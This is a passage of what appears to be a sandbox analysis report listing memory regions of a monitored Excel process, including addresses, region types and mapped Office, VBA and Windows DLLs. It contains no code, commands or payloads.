entry_point = 0x0
region_type = private
name = "private_0x000000000dcd0000"
filename = ""
Region:
id = 779
start_va = 0xeca0000
end_va = 0xfc6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000eca0000"
filename = ""
Region:
id = 780
start_va = 0x4c30000
end_va = 0x4c30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 781
start_va = 0x4ca0000
end_va = 0x4ca2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 782
start_va = 0x4cb0000
end_va = 0x4cb2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 783
start_va = 0x4cc0000
end_va = 0x4cc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 784
start_va = 0x4e80000
end_va = 0x4e83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e80000"
filename = ""
Region:
id = 785
start_va = 0x4e90000
end_va = 0x4e94fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 786
start_va = 0x4ea0000
end_va = 0x4ea0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ea0000"
filename = ""
Region:
id = 787
start_va = 0x5310000
end_va = 0x5312fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 788
start_va = 0x5320000
end_va = 0x5320fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005320000"
filename = ""
Region:
id = 789
start_va = 0x5df0000
end_va = 0x5dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005df0000"
filename = ""
Region:
id = 790
start_va = 0x6060000
end_va = 0x606ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 791
start_va = 0x6070000
end_va = 0x6070fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 792
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 793
start_va = 0x8e00000
end_va = 0x8e16fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 794
start_va = 0x8e20000
end_va = 0x8e20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e20000"
filename = ""
Region:
id = 795
start_va = 0x8e30000
end_va = 0x8e30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e30000"
filename = ""
Region:
id = 796
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 797
start_va = 0x7fef3170000
end_va = 0x7fef3361fff
monitored = 0
entry_point = 0x7fef317101c
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 798
start_va = 0x8510000
end_va = 0x860ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 799
start_va = 0x8610000
end_va = 0x887ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008610000"
filename = ""
Region:
id = 800
start_va = 0x8610000
end_va = 0x87cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008610000"
filename = ""
Region:
id = 801
start_va = 0x8800000
end_va = 0x887ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008800000"
filename = ""
Region:
id = 802
start_va = 0x8610000
end_va = 0x86cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 803
start_va = 0x8750000
end_va = 0x87cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008750000"
filename = ""
Region:
id = 804
start_va = 0xd7f0000
end_va = 0xdbeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000d7f0000"
filename = ""
Region:
id = 805
start_va = 0x3b50000
end_va = 0x3b50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 806
start_va = 0xfc70000
end_va = 0x100cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 807
start_va = 0xfc70000
end_va = 0x100eefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 808
start_va = 0x9f30000
end_va = 0xa290fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f30000"
filename = ""
Region:
id = 809
start_va = 0x100f0000
end_va = 0x110bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000100f0000"
filename = ""
Region:
id = 810
start_va = 0x110c0000
end_va = 0x1208ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000110c0000"
filename = ""
Region:
id = 811
start_va = 0x12090000
end_va = 0x1305ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000012090000"
filename = ""
Region:
id = 812
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 813
start_va = 0x4ca0000
end_va = 0x4ccffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "xlsrvintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\xlsrvintl.dll")
Region:
id = 814
start_va = 0x4e80000
end_va = 0x4eaffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "xlsrvintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\xlsrvintl.dll")
Region:
id = 815
start_va = 0x7fef40f0000
end_va = 0x7fef4520fff
monitored = 1
entry_point = 0x7fef42533cc
region_type = mapped_file
name = "vbe7.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")
Region:
id = 816
start_va = 0x41b0000
end_va = 0x41b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041b0000"
filename = ""
Region:
id = 817
start_va = 0x753c0000
end_va = 0x75491fff
monitored = 0
entry_point = 0x753e14e4
region_type = mapped_file
name = "msvcr100.dll"
filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll")
Region:
id = 818
start_va = 0x5310000
end_va = 0x532ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 819
start_va = 0x9f30000
end_va = 0xa1b0fff
monitored = 1
entry_point = 0x9f44c98
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 820
start_va = 0x7fee7440000
end_va = 0x7fee76cefff
monitored = 1
entry_point = 0x7fee7454c98
region_type = mapped_file
name = "vbeui.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll")
Region:
id = 821
start_va = 0x41d0000
end_va = 0x41d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041d0000"
filename = ""
Region:
id = 822
start_va = 0x4ba0000
end_va = 0x4baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ba0000"
filename = ""
Region:
id = 823
start_va = 0x7fef40c0000
end_va = 0x7fef40e5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbe7intl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll")
Region:
id = 824
start_va = 0x4c30000
end_va = 0x4c39fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normnfd.nls"
filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls")
Region:
id = 825
start_va = 0x8880000
end_va = 0x897ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008880000"
filename = ""
Region:
id = 826
start_va = 0x9f30000
end_va = 0xa030fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f30000"
filename = ""
Region:
id = 827
start_va = 0x13060000
end_va = 0x1402ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000013060000"
filename = ""
Region:
id = 828
start_va = 0xa040000
end_va = 0xa140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a040000"
filename = ""
Region:
id = 829
start_va = 0xa150000
end_va = 0xa250fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a150000"
filename = ""
Region:
id = 830
start_va = 0x14030000
end_va = 0x14ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000014030000"
filename = ""
Region:
id = 831
start_va = 0xa7f0000
end_va = 0xa8f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a7f0000"
filename = ""
Region:
id = 832
start_va = 0xae40000
end_va = 0xaf40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ae40000"
filename = ""
Region:
id = 833
start_va = 0x15000000
end_va = 0x15fcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000015000000"
filename = ""
Region:
id = 834
start_va = 0x7fefb770000
end_va = 0x7fefb79bfff
monitored = 0
entry_point = 0x7fefb7715c4
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 835
start_va = 0xaf50000
end_va = 0xb050fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000af50000"
filename = ""
Region:
id = 836
start_va = 0x7fef9bd0000
end_va = 0x7fef9bddfff
monitored = 0
entry_point = 0x7fef9bd5500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 837
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 838
start_va = 0x15fd0000
end_va = 0x16f9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000015fd0000"
filename = ""
Region:
id = 839
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 840
start_va = 0x16fa0000
end_va = 0x170a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000016fa0000"
filename = ""
Region:
id = 841
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 842
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 843
start_va = 0x170b0000
end_va = 0x171b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000170b0000"
filename = ""
Region:
id = 844
start_va = 0x171c0000
end_va = 0x1818ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000171c0000"
filename = ""
Region:
id = 845
start_va = 0x5310000
end_va = 0x5311fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005310000"
filename = ""
Region:
id = 846
start_va = 0x5320000
end_va = 0x532ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005320000"
filename = ""
Region:
id = 847
start_va = 0x5df0000
end_va = 0x5df1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005df0000"
filename = ""
Region:
id = 848
start_va = 0x6060000
end_va = 0x606ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 849
start_va = 0x6070000
end_va = 0x607ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 850
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 851
start_va = 0x8510000
end_va = 0x8510fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 852
start_va = 0x8520000
end_va = 0x8520fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008520000"
filename = ""
Region:
id = 853
start_va = 0x8530000
end_va = 0x8546fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 854
start_va = 0x8550000
end_va = 0x8550fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008550000"
filename = ""
Region:
id = 855
start_va = 0x8590000
end_va = 0x860ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008590000"
filename = ""
Region:
id = 856
start_va = 0x6060000
end_va = 0x6060fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 857
start_va = 0x6070000
end_va = 0x6072fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 858
start_va = 0x6ec0000
end_va = 0x6ec2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 859
start_va = 0x8530000
end_va = 0x8533fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 860
start_va = 0x8540000
end_va = 0x8544fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008540000"
filename = ""
Region:
id = 861
start_va = 0x8560000
end_va = 0x8562fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008560000"
filename = ""
Region:
id = 862
start_va = 0x8570000
end_va = 0x8570fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008570000"
filename = ""
Region:
id = 863
start_va = 0x8580000
end_va = 0x8582fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008580000"
filename = ""
Region:
id = 864
start_va = 0x86d0000
end_va = 0x86d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 865
start_va = 0x86e0000
end_va = 0x86e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086e0000"
filename = ""
Region:
id = 866
start_va = 0x7fef40a0000
end_va = 0x7fef40bdfff
monitored = 0
entry_point = 0x7fef40a1318
region_type = mapped_file
name = "hlink.dll"
filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll")
Region:
id = 867
start_va = 0x7fee6ba0000
end_va = 0x7fee7437fff
monitored = 0
entry_point = 0x7fee6ba54c0
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")
Region:
id = 868
start_va = 0x6060000
end_va = 0x6060fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006060000"
filename = ""
Region:
id = 869
start_va = 0xa600000
end_va = 0xa69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a600000"
filename = ""
Region:
id = 870
start_va = 0x18190000
end_va = 0x183affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 871
start_va = 0x6070000
end_va = 0x6070fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 872
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 873
start_va = 0x8510000
end_va = 0x8515fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 874
start_va = 0x8530000
end_va = 0x8586fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 875
start_va = 0x86d0000
end_va = 0x86d3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 876
start_va = 0x86f0000
end_va = 0x86f8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086f0000"
filename = ""
Region:
id = 877
start_va = 0x8700000
end_va = 0x8712fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008700000"
filename = ""
Region:
id = 878
start_va = 0x8720000
end_va = 0x8723fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008720000"
filename = ""
Region:
id = 879
start_va = 0x8730000
end_va = 0x8739fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 880
start_va = 0xaa00000
end_va = 0xaac2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aa00000"
filename = ""
Region:
id = 881
start_va = 0xad00000
end_va = 0xada1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ad00000"
filename = ""
Region:
id = 882
start_va = 0xadc0000
end_va = 0xae3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000adc0000"
filename = ""
Region:
id = 883
start_va = 0x18190000
end_va = 0x182fcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 884
start_va = 0x18330000
end_va = 0x183affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018330000"
filename = ""
Region:
id = 885
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 886
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 887
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 888
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 889
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 890
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 891
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 892
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 893
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 894
start_va = 0x87d0000
end_va = 0x87e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087d0000"
filename = ""
Region:
id = 895
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 896
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 897
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 898
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 899
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 900
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 901
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 902
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 903
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 904
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 905
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 906
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 907
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 908
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 909
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 910
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 911
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 912
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 913
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 914
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 915
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 916
start_va = 0x8740000
end_va = 0x8740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008740000"
filename = ""
Region:
id = 917
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 918
start_va = 0x183b0000
end_va = 0x184b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000183b0000"
filename = ""
Region:
id = 919
start_va = 0x183b0000
end_va = 0x184a8fff
monitored = 0
entry_point = 0x183b3830
region_type = mapped_file
name = "excel.exe"
filename = "\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\excel.exe")
Region:
id = 920
start_va = 0x8740000
end_va = 0x8743fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 921
start_va = 0xb180000
end_va = 0xb208fff
monitored = 0
entry_point = 0xb18caf0
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll")
Region:
id = 922
start_va = 0x8980000
end_va = 0x89a8fff
monitored = 0
entry_point = 0x8a4f400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 923
start_va = 0x8530000
end_va = 0x856ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008530000"
filename = ""
Region:
id = 924
start_va = 0x8510000
end_va = 0x8512fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008510000"
filename = ""
Region:
id = 925
start_va = 0x8570000
end_va = 0x8573fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008570000"
filename = ""
Region:
id = 926
start_va = 0x8580000
end_va = 0x8580fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008580000"
filename = ""
Region:
id = 927
start_va = 0x86d0000
end_va = 0x86d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 928
start_va = 0x86f0000
end_va = 0x86f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000086f0000"
filename = ""
Region:
id = 929
start_va = 0x8700000
end_va = 0x8703fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008700000"
filename = ""
Region:
id = 930
start_va = 0x9190000
end_va = 0x91cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009190000"
filename = ""
Region:
id = 931
start_va = 0x8710000
end_va = 0x8713fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008710000"
filename = ""
Region:
id = 932
start_va = 0x8720000
end_va = 0x8723fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008720000"
filename = ""
Region:
id = 933
start_va = 0x87d0000
end_va = 0x87e6fff
monitored = 1
entry_point = 0x89333cc
region_type = mapped_file
name = "vbe7.dll"
filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll")
Region:
id = 934
start_va = 0x7fef3fe0000
end_va = 0x7fef4099fff
monitored = 0
entry_point = 0x7fef3fe1040
region_type = mapped_file
name = "uiautomationcore.dll"
filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll")
Region:
id = 935
start_va = 0xfc70000
end_va = 0xfe8efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 936
start_va = 0x8730000
end_va = 0x8735fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 937
start_va = 0x8e00000
end_va = 0x8e28fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 938
start_va = 0x8e40000
end_va = 0x8e68fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 939
start_va = 0xfe90000
end_va = 0xff9afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fe90000"
filename = ""
Region:
id = 940
start_va = 0xffa0000
end_va = 0x10099fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ffa0000"
filename = ""
Region:
id = 941
start_va = 0x87f0000
end_va = 0x87f3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 942
start_va = 0x89b0000
end_va = 0x89b3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089b0000"
filename = ""
Region:
id = 943
start_va = 0x91d0000
end_va = 0x924afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 944
start_va = 0x9250000
end_va = 0x9278fff
monitored = 1
entry_point = 0x0
region_type = private
